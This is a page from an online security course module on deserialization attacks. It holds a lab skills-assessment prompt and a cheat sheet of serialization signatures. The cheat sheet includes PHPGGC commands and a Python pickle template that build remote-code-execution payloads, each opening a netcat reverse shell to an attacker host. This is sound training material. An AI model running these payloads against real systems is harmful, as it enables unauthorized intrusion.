Introduction to Deserialization Attacks

Skills Assessment I

You are tasked with testing the HTBrain note-taking application for vulnerabilities.

Your Second Brain: "Your mind is for having ideas, not holding them.", so don't overload your brain with ideas; just dump them into HTBrain.
Convenient: Our web app allows you to write down your thoughts and quick notes easily and securely.
Secure: Our web app does not require any authentication or logins; all data is stored on the front end, and nothing is saved on our servers.

This is a white-box assessment, so the application's source code is available for you to look through.

VPN Servers

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.

PROTOCOL

UDP 1337

TCP 443

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Download VPN Connection File

+ 15 [http://SERVER_IP:8001] Achieve RCE and submit the contents of flag.txt

+10 Streak pts

htbrain-src.zip

Previous Next

Go to Questions

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Identifying the use of Serialization

White-Box

Function	Language
`unserialize()`	PHP
`pickle.loads()`	Python (Pickle)
`jsonpickle.loads()`	Python (JSONPickle)
`yaml.load()`	Python (PyYAML, ruamel.yaml)
`readObject()`	Java
`Deserialize()`	C#/.NET
`Marshal.load()`	Ruby

Black Box

Bytes	Language
`a:4:{i:0;s:4:"Test";i:1;s:4:"Data";i:2;a:1:{i:0;i:4;}i:3;s:7:"ACADEMY";}`	PHP
`(lp0\nS'Test'\np1\naS'Data'\np2\na(lp3\nI4\naaS'ACADEMY'\np4\na.`	Python 2.x (Pickle Protocol 0)
`80 01` (Hex)	Python 2.x (Pickle Protocol 1)
`80 02` (Hex)	Python 2.3+ (Pickle Protocol 2)
`80 03` (Hex)	Python 3.8+ (Pickle Protocol 4)
`80 04 95` (Hex)	Python 3.x (Pickle Protocol 5)
`["Test", "Data", [4], "ACADEMY"]`	Python 2.7 / 3.6+ (JSONPickle
`- Test\n- Data\n- - 4\n- ACADEMY\n`	Python 3.6+ (PyYAML / ruamel.yaml)
`AC ED 00 05 73 72` (Hex), `rO0ABXNy` (Base64)	Java
`00 01 00 00 00 ff ff ff ff` (Hex), `AAEAAAD/////` (Base64)	C#/.NET
`04 08` (Hex)	Ruby

Exploiting PHP Deserialization

PHPGGC

# List out available gadget chains for a specific framework:
phpggc -l Laravel

# Generate an RCE payload using a specific gadget chain:
phpggc Laravel/RCE9 system 'nc -nv <ATTACKER_IP> 9999 -e /bin/bash' -b

# Generate a payload to exploit a PHAR deserialization vulnerability:
phpggc -p phar Laravel/RCE9 system 'nc -nv <ATTACKER_IP> 9999 -e /bin/bash' -o exploit.phar

Exploiting Python Deserialization

# Template for Pickle RCE exploit:

import pickle
import base64
import os

class RCE:
	def __reduce__(self):
		return os.system, ("nc -nv 1.2.3.4 5555 -e /bin/bash",)

print(base64.b64encode(pickle.dumps(RCE())).decode())

Introduction to Deserialization Attacks

Skills Assessment I

Questions

Table of Contents

Introduction

Exploiting PHP Deserialization

Exploiting Python Deserialization

Defending against Deserialization Attacks

Skills Assessment

My Workstation